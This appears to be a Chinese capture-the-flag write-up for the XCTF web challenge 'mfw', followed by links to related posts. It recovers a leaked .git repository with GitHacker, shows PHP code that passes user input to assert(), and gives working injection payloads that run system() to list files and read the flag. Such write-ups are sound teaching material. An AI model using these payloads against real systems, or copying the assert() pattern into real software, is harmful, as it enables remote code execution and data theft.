XCTF WEB mfw
XCTF WEB mfw
- 比赛打自闭了,需要好好学习
打开网页看见(猜测git源码泄露):
在URL后面加上./git发现:
使用脚本,在Linux环境中:
pip install requests
git clone https://github.com/wangyihang/GitHacker.git
python GitHacker.py [Website]
得到源码:
flag文件貌似没得啥:
查看index.php文件内容得到PHP源码:
<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>
html代码........
代码审计以及思路:
了解assert()函数的使用:
assert()函数会将读入的代码当做PHP代码来执行,这就方便了!!
进行注入,注入的思路:
首先对strpos函数进行闭合,构造一下,page=’)
可以把后面
', '..') === false
的给注释掉,构造page=').phpinfo();//
,可以得到回显或者不注释也行,直接插入,构造
page='.phpinfo().'
,也可以看见:既然可以执行函数,那就简单了,使用system()函数(system函数详解),构造查看目录的payload:
?page='.system("ls").'
或者page=').system("ls");//
前者直接显示,后者在源码中才能看见。由于源码直接下载有,所以直接构造得到flag的payload:
?page=').system("cat templates/flag.php");//
或者?page='.system("cat templates/flag.php").'
两者都需查看源码!!
XCTF WEB mfw相关推荐
- 「干货」XCTF Web安全入门练习靶场全部通关教程
也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大 少走了弯路,也就错过了风景,无论如何,感谢经历 0x01 view_source Write Up XCTF ...
- XCTF WEB simple_php
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5072 题解: 掌握php弱类型比较 ...
- XCTF WEB simple_js
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5067 题解: F12查看网页源代码 ...
- XCTF WEB command_execution
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5071 题解: windows或li ...
- XCTF WEB webshell
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070 版本一 题解:修改HTML代 ...
- XCTF WEB weak_auth
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5069 题解:暴力破解 工具:Bur ...
- XCTF WEB xff_referer
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5068 题解: 工具:Burp Su ...
- XCTF WEB disabled_button
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5066 题解: 修改HTML代码 然 ...
- XCTF WEB cookie
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5065 题解: 查看浏览器Cooki ...
- XCTF WEB backup
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5064 题解: 下载http://1 ...
最新文章
- 如何制作启动盘安装ubuntu系统
- phpinfo查看可以解析的后缀_配置nginx,Apache支持pathinfo模式-什么是phpinfo模式
- Boost:宏BOOST_ASSERT的使用实例
- 浙江中医药大学第十一届程序设计竞赛题解
- 特性Attribute
- C++总结篇(3)String类
- centos安装python3.7.0过程记录
- 会议管理SaaS平台Social Tables融资1300万美元
- Bailian2708 平衡饮食【序列处理】
- 没学好 Netty ,要凉?
- Windows10+VS2019+OpenGL安装配置详解
- 短视频直播怎么搭建_直播平台搭建流程
- 移动端 Retina屏 各大主流网站1px的解决方案
- win10去掉快捷方式小箭头_快捷方式小箭头很烦人 一招教你取消
- 计算机可靠度计算公式,可靠性计算公式大全
- SQL注入之Mssql注入及原理
- flask容联云发送短信验证码和异步发送
- FleaPHP 学习笔记1
- 第6期(江西省吉安市永丰县)县长手机信箱工作简报(自吹自擂政绩,自圆其说)
- linux-千兆网口测速只有百兆